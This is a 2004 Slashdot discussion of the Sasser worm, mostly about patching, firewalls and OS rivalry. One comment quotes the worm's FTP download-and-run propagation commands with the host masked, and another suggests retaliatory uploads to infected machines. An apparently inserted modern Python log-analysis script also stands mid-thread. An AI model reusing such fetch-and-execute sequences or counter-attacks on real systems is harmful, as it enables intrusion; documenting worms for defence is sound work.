New Windows Worm on the Loose
Dynamoo writes "The Internet Storm Center has issued a Yellow Alert due to the spread of the Sasser worm exploiting Windows 2000 and XP machines through a documented flaw in the Local Security Authority Subsystem Service (LSASS) as described in Microsoft Bulletin MS04-011. Initial analysis seems to indicate classic Blaster-style worm behaviour. Right now I'm just getting a probe every 10 minutes or so on my firewall, but this is bound to escalate sharply as the pool of infected machines grows. Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you? More information at Computer Associates, F-Secure, Symantec and McAfee."
the luxury of being behind a nat box with all ports off and not having to deal with such nonsense
What is this 'Windows Update' of which you speak?
Liberals call everyone Nazis yet they are the closest thing to it.
Mutexes are named consistently enough under Windows that I wish somebody would make a program that simply caught all attempts at gaining a mutex and popped up a dialog window if the mutex hadn't been seen before. This would stop most any new software from running without first checking with the user. This is no good for a server of course, but ideal for a workstation.
This would also be great for catching spyware crap installs, as well as things like the RealPlayer toolbar that keeps popping up adverts by default. Simply tell the mutex checker to decline the requested mutex from then on and it would have the mutex always fail from then on -- then those programs could never be run again.
A new worm? Oh, there it is.
Trolling is a art,
For anyone already infected, Microsoft has manual removal instructions for the worm, located here:
http://www.microsoft.com/security/incident/sasser.asp
At least for me as the local consumer support guy.
Thanks Microsoft.
A smile crept across my face after reading this story and then noticing a microsoft ad underneath informing the reader that Windows Server cost of ownership is lower than Linux cost of ownership!
The ad server must be based on Microsoft's new Irony.NET framework!
Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you?
I think all good Windows-using Slashdotters should have thrown their Windows machines off a balcony long... long ago.
Since most users don't have a firewall and don't use Windows Update, I wonder how many machines will be infected by Monday? Seriously now, it's getting old now. Good thing I'm using Linux now.
Fox New's official death toll caused by this new exploit stands at zero, but that can change any second now. Find out how to save yourself, tonight after the weather...
at my university (geaux tigers), we're already feeling the effects. students in the dorms don't patch their computers and they wonder why they get viruses. we send out frequent emails reminding them to patch their computers but they fail to realize it. if only they would use linux......:)
No need, I receive all the Windows critical updates by email. I don't know how I got subscribed to that mailing list, but it's damn convenient.
I have a Mac, you insensitive clod...
Where the value of X-Mailer: is the true measure of a man...
You know, normally these updates are available a good 3 or 4 months before the worm becomes available. This one was updated about 3 days ago. And MS claims to be beefing up their security efforts. ...
In light of this, would someone please explain why I would ever want a Mac? None of the really good viruses or worms are ever ported to it, no matter how successful they are!
This is either a *really* old issue and I've already patched for it, or it's so new MS doesn't have a patch for it yet.
Either way, I don't see anything about it on the windows update site.
Just once, I'd like it if someone called me "Sir".
Without adding, "You're creating a scene."
More information at Computer Associates, F-Secure, Symantec and McAfee.
Where's Panda in that list? Personally I prefer Panda over those.
I'm impressed that they got the headline right!
Ya ooo what a gigantic problem.. Every PC user with a brain should have a firewall and antivirus software running. If they haven't learned yet they deserve to be infected. Here's the extremely complicated solution: Auto update every day.
The hang time between release of information about an exploit and the release of viruses taking advantage of that exploit is going down. It used to be that most worms were based on bugs that were known and patched months or years ago. In the past few months there have been several worms based on bugs that were fixed only days or weeks before. That makes it much more important to keep up to date with patches than it has been historically.
Windows XP SP2 should mitigate this somewhat, since it will tell a lot more people to update a lot more regularly, plus it comes with a decent firewall. The news that it is delayed is unfortunate to say the least.
Seriously, hasn't MS learnt anything about the Internet yet? Why do they keep insisting on keeping all of these ports open all the time? Why so many services running out of the box? Why can't people even close some of the listening ports?
If MS was at all serious about security, they would have all ports closed by default. Or at least have a possibility of closing them down during install.
It then connects to that shell, and executes the following commands (cleaned up to get past Slashdot's junk filter):
open XXX.XXX.XXX.XXX 5554
anonymous
user
bin
get XXXXX_up.exe
bye
XXXXX_up.exe
If successful, those commands ftp to the attacking host, port 5554, and download the actual worm payload. That payload is executed, and the host is fully infected. It then opens an FTP port on port 5554, and begins scanning for vulnerable hosts. Here's the scanning logic, from symantec:
The IP addresses generated by the worm are distributed as follows:
50% are completely random
25% have the same first octet as the IP address of the infected host
25% have the same first and second octet as the IP address of the infected host.
The worm starts 128 threads that scan randomly-chosen IP addresses. This demands a lot of CPU time and as a result an infected computer may be so slow as to be barely useable.
See:
So I used Microsoft Baseline Security Analyzer to get my patches.
I want a tarpit option for FreeBSD's ipfw, the same way there is for Linux. It'd be nice to do something to slow this thing down...not that it's easy to tell this worm apart from everything else cluttering up my firewall logs.
Carousel is a lie!
Hmm... a new windows worm, exploiting a documented flaw? Never!
Whats new?
# cat
Damn, my RAM is full of llamas.
Slashdot continues its trend of releasing news that will shake your beliefs to the core! I thought for sure the previous worm was the last possible one!
SAILING MISHAP
1) IE won't work (joking aside it just doesn't work at all). This happened a long time ago, so I switched to Mozilla. I thank MS for this 'cause Moz owns.
2) Add/Remove Programs: I can no longer see the text that describes the program install. It's all grey. An icon shows, so I can uninstall that way. It's not the color scheme either; I tried the MS default and it still didn't work.
3) I was having problems with this latest worm, but patching fixed everything, so now we wait to see what broke.
All in all I'm getting extremely close to wiping the HDD, and dual booting Slackware Linux (which has been on my laptop for over a year and I love it) and Win98SE for games. All the backups are current, and I'm waiting for the next problem to make the system more unusable. If I wasn't so damn lazy, this would have been done sooner.
Brendan: Worms and spyware will simply use a home-made mutex system if we start to block the Windows one.
In general, the idea of catching windows library calls is worthless, unless the library call is absolutely necessary to the worm and the functionality cannot be done in any other way (which is not the case in Mr. Darl McBride's example).
The worm seems to install an ftp server on infected machines. So, wouldn't it be nice to have every box that detects a connection on port 554 reply with an upload of a new wallpaper to the infected Windows box with some message like "install a firewall, moron"
I consider it a public service. Maybe you can even deduct the bandwidth for the upload from your tax.
I had updated Windows XP except for whatever patch it was for this security hole because I had heard it caused problems. Then of course, Sasser hits and targets the security hole that I didn't patch for.
Damned if you do, damned if you don't.
I'm rebooting into Linux. Screw you Windows.
www.google.com
4. Gimp sucks compared to Photoshop.
Ah, come on now. I'm as friendly to OS as anyone else, but you're just fooling yourself on this one.
I REALLY hate working dial-up tech support.
(ring)
sigh....
Usually these happen on Thursday.
Don't these worm writers learn anything?
In addition to TCP 1025, the following ports are vulnerable to the LSASS exploit: TCP 135, 139, 445, and 593. UDP 135, 137, 138, and 445.
Sasser generates traffic on TCP ports 445, 5554 and 9996.
The patch for the vulnerability (MS04-011) can be installed through Windows Update or located at the following URL:
http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx
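Putting the scanning logic quoted earlier in the thread (50% random, 25% same first octet, 25% same first two octets) together with the ports listed above, here is an added example, not code from any post in this thread, that tallies probes to the Sasser ports per source in iptables-style drop logs and works out how much of an infected host's scanning lands inside its own /8 or /16. The log lines and addresses are constructed samples, and the assumption that the unfixed octets are drawn uniformly at random is mine, not something the Symantec description states.

```python
"""Tally Sasser-port probes in firewall drop logs and relate them to the worm's
target-selection scheme (50% random / 25% same first octet / 25% same first two octets).

Added example for this thread, not code from the original posts. The log lines below
are constructed samples using RFC 5737 documentation addresses."""
import re
import ipaddress
from collections import Counter

# TCP ports the thread reports Sasser generating traffic on:
# 445 (LSASS exploit), 5554 (the FTP server it opens), 9996 (its remote shell).
SASSER_PORTS = {445, 5554, 9996}

# Share of probes by how many leading octets match the infected host's own address:
# 0 fixed octets (fully random) 50%, 1 fixed octet 25%, 2 fixed octets 25%.
TARGET_SCHEME = {0: 0.50, 1: 0.25, 2: 0.25}

# Fields of an iptables LOG line that matter here (SRC, DST, PROTO, DPT).
LOG_RE = re.compile(
    r"SRC=(?P<src>[\d.]+)\s+DST=(?P<dst>[\d.]+).*?PROTO=(?P<proto>\w+).*?DPT=(?P<dpt>\d+)"
)

# Constructed sample: our firewall is 198.51.100.20; three sources knock on it.
SAMPLE_LOG = """\
May  1 22:13:05 fw kernel: IN=eth0 OUT= SRC=203.0.113.7 DST=198.51.100.20 LEN=48 TTL=114 PROTO=TCP SPT=1042 DPT=445 SYN
May  1 22:13:09 fw kernel: IN=eth0 OUT= SRC=203.0.113.7 DST=198.51.100.20 LEN=48 TTL=114 PROTO=TCP SPT=1043 DPT=445 SYN
May  1 22:13:11 fw kernel: IN=eth0 OUT= SRC=198.51.100.77 DST=198.51.100.20 LEN=48 TTL=128 PROTO=TCP SPT=2201 DPT=445 SYN
May  1 22:13:14 fw kernel: IN=eth0 OUT= SRC=203.0.113.7 DST=198.51.100.20 LEN=48 TTL=114 PROTO=TCP SPT=1044 DPT=80 SYN
May  1 22:13:20 fw kernel: IN=eth0 OUT= SRC=198.51.100.77 DST=198.51.100.20 LEN=48 TTL=128 PROTO=TCP SPT=2202 DPT=5554 SYN
May  1 22:13:25 fw kernel: IN=eth0 OUT= SRC=198.51.100.77 DST=198.51.100.20 LEN=78 TTL=128 PROTO=UDP SPT=137 DPT=137
May  1 22:13:31 fw kernel: IN=eth0 OUT= SRC=198.77.4.9 DST=198.51.100.20 LEN=48 TTL=109 PROTO=TCP SPT=3310 DPT=9996 SYN
May  1 22:13:40 fw kernel: IN=eth0 OUT= SRC=203.0.113.7 DST=198.51.100.20 LEN=48 TTL=114 PROTO=TCP SPT=1045 DPT=445 SYN
"""


def parse_drops(text):
    """Yield (src, dst, proto, dport) for every log line the regex matches."""
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if m:
            yield m["src"], m["dst"], m["proto"], int(m["dpt"])


def sasser_probe_counts(text):
    """Count TCP connection attempts per source that hit one of SASSER_PORTS.
    UDP and other TCP ports are ignored so NetBIOS chatter does not inflate the tally."""
    counts = Counter()
    for src, _dst, proto, dport in parse_drops(text):
        if proto == "TCP" and dport in SASSER_PORTS:
            counts[src] += 1
    return counts


def suspect_sources(text, threshold=3):
    """Sources with at least `threshold` Sasser-port probes, busiest first."""
    return [(src, n) for src, n in sasser_probe_counts(text).most_common() if n >= threshold]


def locality(src, ours):
    """Classify a source relative to our address by the octets the worm keeps fixed."""
    addr = ipaddress.ip_address(src)
    if addr in ipaddress.ip_network(f"{ours}/16", strict=False):
        return "same /16"
    if addr in ipaddress.ip_network(f"{ours}/8", strict=False):
        return "same /8"
    return "other"


def own_network_share(prefix_octets):
    """Fraction of an infected host's probes that land inside its own /8 (1 octet),
    /16 (2 octets) or /24 (3 octets). Assumes the non-fixed octets are uniform random
    (an assumption of this example; the thread only gives the 50/25/25 split)."""
    return sum(
        share * (1.0 if fixed >= prefix_octets else 256.0 ** (fixed - prefix_octets))
        for fixed, share in TARGET_SCHEME.items()
    )


def uniform_share(prefix_octets):
    """Same quantity for a scanner that picks every octet at random, for comparison."""
    return 256.0 ** -prefix_octets


if __name__ == "__main__":
    ours = "198.51.100.20"
    for src, n in suspect_sources(SAMPLE_LOG, threshold=2):
        print(f"{src:15} {n} Sasser-port probes ({locality(src, ours)})")
    for octets, name in ((1, "/8"), (2, "/16")):
        print(f"{name}: {own_network_share(octets):.4%} of an infected host's probes "
              f"vs {uniform_share(octets):.4%} for uniform random scanning")
```

The /16 figure is why one infected dorm PC hammers its own campus far harder than the rest of the Internet: roughly a quarter of its probes stay inside its /16, against one in 65536 for a purely random scanner.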
This link should work for the symantec description of Sasser. Sangloth I'd appreciate any comment with a logical basis...it doesn't even have to agree with me.
...Mac users worldwide pause, yawn/chuckle, and resume being productive on their machines instead of patching holes or manually yanking out already-present malware.
after reading this on the /. front page, i ran Windows Update, which i haven't visited for more than a year...
and after some time, a window pops up with the text:
"The software you are installing has not passed the Windows Logo testing to verify its compatibility with Windows XP. bla bla bla"
"This software will *not be installed*. Contact your system administrator."
Ok, so i contact myself, and wonder what the hell?!?
I just gave M$ a lot of information about the operating system that i'm running... they wrote the friggin' thing, and even so, they don't know what will run on it, or what will pass their own crap compatibility verification!
but well, that's it... i just click "OK" --the only button-- and see the same window appear 3 more times... and blissfully keep my ignorance of what's going on with the installation.
424 attempts in my logs since April 29. All coming through port 1025, mostly from Asian boxes.
Only consumer whores and other types of idiots choose to toss out the computer instead of just wiping the hard drive and installing something else.
Speaking of worms, how easily could worms spread if it were Linux that was popular and not windows?
I know linux is more secure, especially because of the multi-user system where root is only used for special reasons, and that many windows programs are integrated in the OS (IE, Outlook...), but how feasible WOULD it be to make worms for Linux? I really don't know. I do use Linux, and I love it. I only boot into windows for certain things such as Battlefield 1942...
---
Never criticize religion on Slashdot. You will be modded down for "Troll" no matter how factual it is.
How refreshing. A Slashdot article about a worm exploiting Windows, without the usual childish jibes. Or FUD. Or spelling mistakes. Well done, Dynamoo!
Of course, then came the comments... :-)
... if we replaced the posts of this thread with the messages posted after a previous worm-announcement, would anyone notice ? :)
;-)
Linux_Zealot says : 5 Insightful - I am using Linux now !
M$_wizard : 5 Interesting - Worms always appear after a security notice from Microsoft Knowledge Base ; so, openness is bad !
security_Teacher : 5 Insightful - Of course, no one should run anything as root but cricital administration tasks, and a firewall is essential.
n00b : -1 Troll - Windows Sucks !!!
Well... That's just a little... repetitive
Just unbind 'Client for Microsoft Networks' and 'File and Printer Sharing for Microsoft Networks' on your NIC. That way, unless someone can exploit basic TCP/IP services like echo, you should be safe.
After I changed email address, I couldn't figure out where I'd subscribed to that newsletter, either... I'd really like it back...
Secunia also alerted about this worm several hours ago, they have a great page about it with lots of details: Sasser worm details
I re-formatted my system and put my firewall up. It was an older version so I uninstalled it and got pre-occupied for 2 minutes... before I had the new one up, Blaster worm. 10 minutes later, re-format.
Damn worm writers.
ogg
Black cat, searing pain, flames...? I must be in Heaven! - Homer Simpson
Everyone knows not to use Windows products until after at least 1 service pack; this is an old problem that was fixed with Service Pack 1. I hope no one on /. is affected by this, because even if you miss most updates, the service packs are the important ones.
I run Windows XP Pro at home so this post raised my concern at first, but if anyone actually read the Microsoft security bulletin, you would all know this.
Before I get flamed for running Windows, that box mostly just runs games, though sometimes I have it running distccKNOPPIX to help cross-compile for my Gentoo Box, its time to rebuild again now that 2004.1 came out!!!!
~ there are 10 types of people in this world, those that can read binary and those that can't
This is like a freaking death sentence considering everyone in town thinks that this is their own free computer tech support hotline.
but it's per se
So for the past few days, I've had to live with part of my bandwidth getting chewed up by incoming packets that don't actually do anything but take up space. It effectively slowed the speed of downloads by about half. The rate of packets is starting to slow down now... finally (I guess as people patch their systems), but it still was highly annoying.
Anyways, I called my ISP when I first noticed it 3 days ago (after checking it with Ethereal), and asked if they could help. They told me that this was caused by filesharing programs, which I knew wasn't the case because in fact the only port 445 stuff I've done is Windows filesharing, and I've secured the one and only Windows system on my LAN against IP addresses other than the ones on my LAN being able to access it. Needless to say, this answer did not impress me. Here I was, effectively being subjected to a DoS attack, and they are trying to tell me this is _my_ fault? Man, if I had any other choice for high speed internet, I'd be switching in a heartbeat.
Anyways, that's my story. Things like this totally bite because you can have a firewall and all the security precautions in the world, but worms like this still chew up your bandwidth.
File under 'M' for 'Manic ranting'
Windows-using != Slashdotters. There's a contradiction right there.
I once heard of them. Do they really exist, or was my friend just trying to frighten me?
I use the best anti virus on the market! It is called a Mac! Actually I have both a Mac and a WindowsXP Pro box with a router and firewall. Just to keep things clean my windows machine is NEVER used for checking mail. All mail is handled through the Mac. If I have a need to send mail via the PC or need to check it from the PC for some reason then Eudora Pro is used. The Outlook variants are the biggest viri available for the PC....with explorer coming in a close second.
Look at the title of the Sasser worm "what you should do..." page, it says Blaster not Sasser.
Updating windows for the average user doesn't give a bigger headache than fixing something on linux (unless using debian-based distros or gentoo) but is it the same story for companies running winnt-based servers? Just curious since it must be annoying for them and must be these things which makes them think of moving away from the buttafly!
Woops, nevermind...
I pity my educational counterparts in other districts...one in particular has probably a dozen Win2K/W2K3 machines sitting outside the firewall...no protection whatsoever. No, they do not do regular updates...just when something breaks. Oh well, they'll just hire their friendly neighborhood MCSE consultants to come in at $150 an hour to "sell them some protection." It seems like it's always firefighting with Windows anymore...And no, I do NOT run Windows on any server in my district...
another piece of software I can't get for my mac?
I've been working in the Technical Support department of a major Anti-Virus company all day and I am currently speaking to the first customer who is infected with this worm. Hopefully it won't spread.
most of these problems they have (certain virii, spyware adware) could be alleviated and less of a threat simply by running limited user accounts instead of running as an "admin" all the time.
tested this in my home network (the other half has to have windows) her rights are set by a samba acting as a PDC(i was bored), but basically boils down to a simple matter of her account is considered a "limited account" to her local XP machine...if something needs to be installed or needs admin rights she can explicitly tell it to by using the run as...
i've gone from cleaning 50+ items / week off that machine to maybe 3-4 and those are simply cookies being reported as "spyware".
tribbles are nothing compared to trolls.
besides trolls smell.
Microsoft needs to stop rehashing NT 4.0 code into Windows 2000, XP and 2003. Isn't it funny how an exploit in NT 4.0 also appears on NT 5.x systems?
Here is an introduction to viruses for non-Windows users.
A countdown timer telling me Windows is going to shut down in 1 minute is great for keeping me on my toes in the morning; I managed to do a quick search and was half-way through reading a forum when it restarted :( installed the patch and it seems to have been fixed, but i thought Windows Update was supposed to be automatic?!?! it regularly reminds me to install new patches, why not this?
This comment does not represent the views or opinions of the user.
deny tcp any any eq 445 (hitcnt=74147) .... thats since last night.
Wow. I just got that virus this morning (and I'm on a dial-up modem!!!). I had no idea what was going on, but I figured it was a virus. I saw a new program in the "Tasks" window, so I closed the window, found and deleted the file, and destroyed the Registry key that it had made for reference in MSCONFIG.EXE. That was all there was to it! I'm glad that the creator of the virus was either a dork or a "nice" virus creator and made the virus very easy to get rid of.
I agree the problem is the lack of consumer education, but chastising/blaming the consumers isn't going to get anything done. Companies like Microsoft need to ship their products securely, with ports closed, firewalls on, and with desktop shortcuts/documents telling users why it's important to patch.
Thankfully, Microsoft hopes to accomplish much of this with XP Service Pack 2, hence why the Service Pack is taking so long to be released.
Up, Up, Down, Down, Left, Right, Left, Right, B, A, START
Of course, here on slashdot, it's common enough to correctly identify this sort of malware as a "windows worm," but if this terminology could make it into the more general media, it might raise the general consciousness to make people more aware of the alternatives to Windows. Maybe some informed and polite letters to your local newspaper might make a difference.
or didn't you want a paycheck this month ?
with love
your boss
Microsoft should instead find a way to abandon the use of the "SYSTEM" account, the password-less "super user" account that all applications use to install themselves and modify core system settings.
Or at least disable Internet Explorer/ActiveX's abilities to grant web pages use of the SYSTEM account. (Microsoft could just as easily develop a Windows-updating program similar to "Software Update" on OSX or yum.)
Up, Up, Down, Down, Left, Right, Left, Right, B, A, START
I'm happy, I'm behind a firewall on XP right now, and am firewalling off another PC running XP at the same time. Both PCs are safe, both are running fine.
But still, it's stupid to have any OS that has all these worms going around. I'd like to see Microsoft go through what they already have in their codebase and pull these little fuckers out, then patch 'em. Patch 'em good, patch 'em hard.
Yeah, it's not open source, less eyeballs on the code etc etc, but I'm sorry but if Microsoft, a corporation which is not only making in the region of several billion $PLURALCURRENCY a year but is a frickin' defense contractor, can't invest some money in poking through their code and going "nope, some script kiddie piece of shit is gonna 0wn that" then there's no hope for us all.
(Note: I have just moved to XP from Linux because of hardware not working. So far I haven't got Blaster or been cracked in any other way. I must be lucky or something. *g*)
I'm amazing. You aren't. SUCK IT
try using a google cache.
i've told soo many others by so now, so i might as well put it on slashdot
Blah blah sig blah blah blah irony blah blah
" Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you? " roflol windows-update is the virus factory ;)
http://fedora.redhat.com
http://www.gentoo.org
http://www.debian.org
http://www.linux-mandrake.com
http://www.slackware.com
"Ha Ha!"
Nelson, various Simpsons episodes
No electrons were harmed creating this post, though some may have been subjected to electrical and/or magnetic fields.
For the first time in history, /. is useful! I was wondering why my box was acting silly, open /., get an error message that an error in lsass.exe will shut down my computer, and lo, the headline is my problem.... viva la /.!
A patriot must always be ready to defend his country against his government. -edward abbey
Picture a company with a userbase of tens of thousands, multiple hardware types, almost every version of windows with none of them locked down, and limited protection on the server side. Management is just recently getting into the idea of implementing protection at the workstation level while in the meantime viruses and spyware run rampant. To compound this problem, microsoft releases a ton of patches all at once which increases the time it takes to deploy them all. Many of them can get fixed via pushes, but not all of them are networked the same way because each area has their own way of doing things. In order to get antivirus and such installed on many PCs, most of which we don't know where they physically are (inventory for licensing and hardware are just now being started to an extent), you need file and print sharing active. Some people know this so they turn off their file and print sharing. They are running ancient hardware that locks up when you run a virus scanner in the background and they can't get any funding to upgrade their hardware. SMS and lockdown and things are beginning to be considered, but when it isn't the viruses or spyware blowing things up it is the network servers running on what amounts to in some cases computers weaker than the client computers. To top it off, there is no anti spyware software that is enterprise ready at this time so management hasn't bought into anything. Almost every computer you look at has something nasty on it. At least one company claims to have a program that is enterprise ready in the beta stage, but we are not even a beta tester yet. Meanwhile the people who started all of this get promotions because they are saving the company money by not doing anything but bandaiding one small problem at a time.
Anyone else notice that all new worms start infecting computers on a friday and it really becomes big when people come back to work on Monday. Sounds like a planned attack to me.
While Sasser is the worm making the news in relation to the LSASS exploit, it's easy to lose sight of the three Gaobot variants that are *also* using the exploit and are, quite frankly, a lot nastier.
I just hope the other variants don't get lost in the hype about Sasser, or ISP's and security folks are going to have much bigger problems on their hands than slowed computers rebooting a lot.
Become an evil genius by eating gifted children!
FreeBSD-based OSX 10.3.4 + A little intelligence = No web-browsing, file-downloading paranoia = Not needing 10 different system-slowing antivirus, antispyware, antimalware, antipopup, anti-spam software.
-Imidazole
Hilarious Office Prank!
You say "killing IE" like it's a bad thing.
Je fume. Tu fumes. Nous fûmes!
Initial analysis seems to indicate classic Blaster-style worm behaviour.
This made me think of a quote from "Broken Arrow", when Giles Prentice (Frank Whaley) is told there is a "broken arrow", he says,
"I don't know what's scarier - losing nuclear weapons or that it happens so often that we have a name for it."
normally my home firewall (linux of course) logs about 100k bytes in messages per day (i have iptables log all dropped packets). Today alone it's over 50 megs. Normally i have logrotate.conf set for weekly rotations, but i switched it to daily, and made sure my var partition has more than enough room (3 gigs free, so i think i am ok).
Lawyers, MBA's, RIAA? A jedi fears not these things!
Microsoft should stop publishing these exploits. It practically forces you to update to preempt the attacks that follow.
Well, to be more accurate, they should delay it longer.
Otherwise it would be called "Microsoft Walls"
For Windows I'm using a free firewall by Agnitum. You can get it here:
http://www.agnitum.com/products/outpost/
I love it. I've installed it on any machine that the owner asks for help with. Its most basic use can be mastered by any user. Anytime something new tries to come in or go out a window pops up and asks what you want to do.
It has some more advanced features too. Perfect for that non-computer-science person you know who uses a computer.
4 my bro., running any mac os, the use of an "ok" button as a dismiss-this-alertbox target: "no, it's NOT fuckin' OK" that the connection was terminated for lack of activity...dial-up's bane;-)
Yah this virus is causing all kinds of hell here at Dell... Our call volume for a normal Saturday is agents waiting for calls for 10 minutes at a time... TODAY, however, we have 60 calls waiting in the queue... 90% of which are this virus. And the sad thing is, outside of an OS reinstall we cannot do anything for these guys except refer them to the articles on how to fix it or send them to our software support... Gotta love policy *rolls eyes*
Our student dorm has its own network volunteer group, which I'm part of. This worm made a big entrance tonight, scoring 27 infections in two hours, on a network comprising about 300 machines, maybe 220 of which are running Windows. We had to take the suckers off the network AND because that's part of our self-imposed policy, drop a filled-in piece of paper into their letter boxes. I felt like the mail man, running around in the entrance hall with a wad of papers under my arm. Oh, and our upstream ISP got pissed at us, threatening to cut our connection altogether. To sum it all up, I'm going to kill the guy who wrote this, right after I cheerfully refuse to reconnect all the suckers who fell for it!
Divide et impera!
What, it's been a week already?
"Writing a suite of mathematical modelling tools to be released as Open Source Software is educationally beneficial."
Check out Scilab. It does what Matlab does pretty much the same way except that Matlab has friendlier GUIs where Scilab is mostly command line. Translating scripts between the two is trivial.
http://scilabsoft.inria.fr/
- You were apparently the only one who could see the funny bit of my post (apart from the mods).
I miss stupidpeopledie.com.
But can you do all of this while compiling OOo for Windows ???
I can minimize a MinGW or Cygwin window with a compile job running while surfing the web in Firefox and listening to the badger song on repeat in Winamp. However, OpenOffice.org requires an expensive compiler unless the project has already tweaked the OO.o suite makefiles to be compatible with Microsoft's two-week-old inexpensive Visual C++ compiler.
Don't you mean to ask if all good Windows-using Slashdotters haven't already migrated to Mac OS X or Linux yet?
yeah, so troll. I know. lol.
Using Symantec AV, I LiveUpdate'd signatures, only to find that it declared System32/w32sup.exe as a trojan and quarantined it.
... these "worms" aren't ever found in APPLES?
God, I love being a Mac user.
Men believe what they want. - Caesar
MCSEs need the work.
Here's a copy of a notice we've been sending to customers on this issue:
There's another worm spreading across the Internet, called the "Sasser Worm".
Vulnerable systems include: Windows 2000, Windows Server 2003, Windows XP
See:
http://us.mcafee.com/virusInfo/default.asp?id=description&virus_k=125007
http://securityresponse.symantec.com/avcenter/venc/data/w32.sasser.worm.html
Microsoft security bulletin on the vulnerability:
http://www.microsoft.com/technet/security/Bulletin/MS04-011.mspx
Among other things, this worm installs an ftp server and a remote shell system to further propagate itself across Windows. It likely has the capability of giving remote users full access and control of the compromised machine, therefore any data on the system may be vulnerable.
Once a machine is infected, it starts 128 instances of itself, trying to spread the worm to other Microsoft PCs. The worm also attempts to disable the ability to shut down or restart the computer/server. The worm may also compromise the "system restore" function under some versions of Windows, so trying to revert back to an older configuration setup might reinstate the compromise!
As you might expect, our servers here are NOT directly affected or vulnerable. However, this is another "blaster" type worm which, once it infects a vulnerable Microsoft system, begins to randomly bombard other systems all around the Internet. The end result will be potentially severe denial-of-service attacks to all systems (in other words, services may be slow or unresponsive due to the traffic increase on the Internet from compromised systems).
We're going to have to wait until Monday to probably see the full effect of this worm. The ability it will have to disrupt major services online is going to depend upon whether or not people have been routinely running Windows Update (http://windowsupdate.microsoft.com/).
If you are running a vulnerable system (Windows Server 2000/2003 and XP are vulnerable; Windows 95/98/ME are not vulnerable) and haven't run Windows Update in the last two weeks, there's a good chance you are vulnerable, if not infected if you are not behind a firewall and have been online for awhile.
This is yet another annoyance for most of us with Windows on our client PCs. By now everyone should be in the habit of automating or running Windows Update every few days.
The real problem is ISPs and web hosting companies that are using Microsoft NT/200x Server and XP for Internet based services. (And we don't do this but there are tons who do) This is particularly dangerous for e-commerce applications. The admins of these servers have to be forever diligent in making sure their systems are secure. Who knows what critical information (customer data, credit card numbers, etc.) is sitting around on these machines. It seems every week there's a new major vulnerability with Microsoft's servers. This is why we don't use MS products for e-commerce and critical services -- we don't want to risk the security of our clients. I urge everyone to be careful about providing e-commerce to systems running Microsoft servers - they have proven to be exponentially more vulnerable than Unix/Linux counterparts. (if you visit a web page and you see URLs with filenames like .ASP or .CFM, that's an indication the system may be running on a MS server and potentially more vulnerable).
As usual, those of us that do run secure systems are now going to be hammered by infected systems so bear with us while we hold out to see if admins of Microsoft Servers can fix their problems fast before their machines spam the Internet with data and cripple everyone else.
I've been getting these packets since before this worm existed.
They are location service broadcasts and seeks from PCs on the same subnet as you. Yeah, that means Windows filesharing.
This isn't necessarily a virus thing. Did you check the packets to see if they contain exploit packets?
I think you're probably wrong.
The first step is to learn what the various types of "malware" are and how each is spread.
#1. Worms
#2. Viruses
#3. Trojans
Then you have to learn about the security model of each of the systems you are discussing.
Then you have to look at the default installation model ('cause most users will take the default).
Then you have to look at the past patch/release behaviour of the groups developing those systems.
Once you do all of that, you'll find that Linux would be far more resistant than Windows is.
But, until you do all of that, you won't believe anyone who says that.
#1. Linux comes with fewer services installed by default and fewer services run with root level permissions. This limits the spread of worms.
#2. Linux is more resistant to viruses because regular users cannot alter executables.
#3. Which leaves trojans and those are mostly spread by executable email attachments. Take away the ability to execute attachments by clicking on them and you limit the spread of trojans.
So, to be as bad as Windows, a single Linux distribution that ran as root by default would have to be in use by 51%+ of the population and that distribution would have to install the same services and have them actively listening for connections and also have an email client that ran attachments with a single click.
Now you'll see why people mock Microsoft's "security" so much. All of those flaws are in Windows.
Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you?
Should read "Of course, all good Slashdotters patch their systems and have a firewall, don't you?".
Running something other than Windows is not a good reason to ignore security.
And in other news ... Delta flights grounded today due to "a computer glitch"
I have to wonder...
Right click Local Area Connection, click advanced, and click enable firewall!
The only game I really play on my home machine is European Air War. Transgaming have listed it as something like: crashes at start or won't start.
Anyone ever had any luck otherwise?
Bochs: I think EAW on Win98 on Bochs on a PII 400MHz just won't work
The Singularity is closer than you think
Quant
This appears to be a recurring theme on Slashdot -- i.e., that release of information about the vulnerability and/or the patch causes the exploit (attached to Slow Down the Security Patch Cycle?). See also here (attached to Secret Repairs Preceded TCP Flaw Release).
Only Women Bleed (Sex, Sharia remix)
Guess you missed the article Slashdot posted which showed that Linux is the OS with the most breaches on the net.
Hell, Gnome, Debian, Gentoo, FSF, Savannah, and more were all broken into in the span of six months. Pretty embarrassing for the Linux community, don't you think?
Will WINE support Windows Update so that I don't have to buy a Microsoft Windows license to run Windows update ?
... disabled on my machine. See, they idiotically count stuff as trivial as 'notepad.exe' as a system file which gets replaced if changed. Trouble is, I like replacing it. For my text editor of choice.
== Jez ==
Do you miss Firefox? Try Pale Moon.
...but how feasible WOULD it be to make worms for Linux?
"Here's your new screensaver!
You will be prompted for the admin password so we can install this and set it up.
[prompt] - Install screensaver|install [keylogger/SMTP/ZombieClient]
Please enter your admin password again to verify the settings for security
Thank you! We appreciate your business! Click here to send this to all your friends!"
Currently, Linux is more secure because, among other things, its users are generally more clued up. Put the general Bonzi fan on Lindows, and you'd see much the same thing.
"5. Open source is insecure by default. Only by hiding your secrets are they kept safe."
Ah yes....then why is the NSA even bothering with Linux? Ever heard of SELinux? The NSA doesn't seem to think the openness is a problem.
Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall
I don't understand why so many geeks promote using single-computer firewalls. Which makes more sense:
1. Run 5 unnecessary services that listen on various ports, then use a firewall to prevent anyone from connecting to them.
2. Don't run any of the services and don't use a firewall.
The shareholder is always right.
I work doing tech support for desktop computers made by Compaq and HP, both of which are sold at Wal-Mart. A friend of mine said "welcome to Hell" when I came in today. Now I know why :^(
It's better to vote for what you want and not get it than to vote for what you don't want and get it.
- E. Debs
He was referring to trojans/viruses spread in emails w/ executable attachments and titled with some fake security bulletin.
Photos.
don't put up with it, wasting tax payers dollars and contributing to the spread of worms on everyone's net. Most states have various ethics laws that might apply to the state worker even if he is just an employee, and not an elected official.
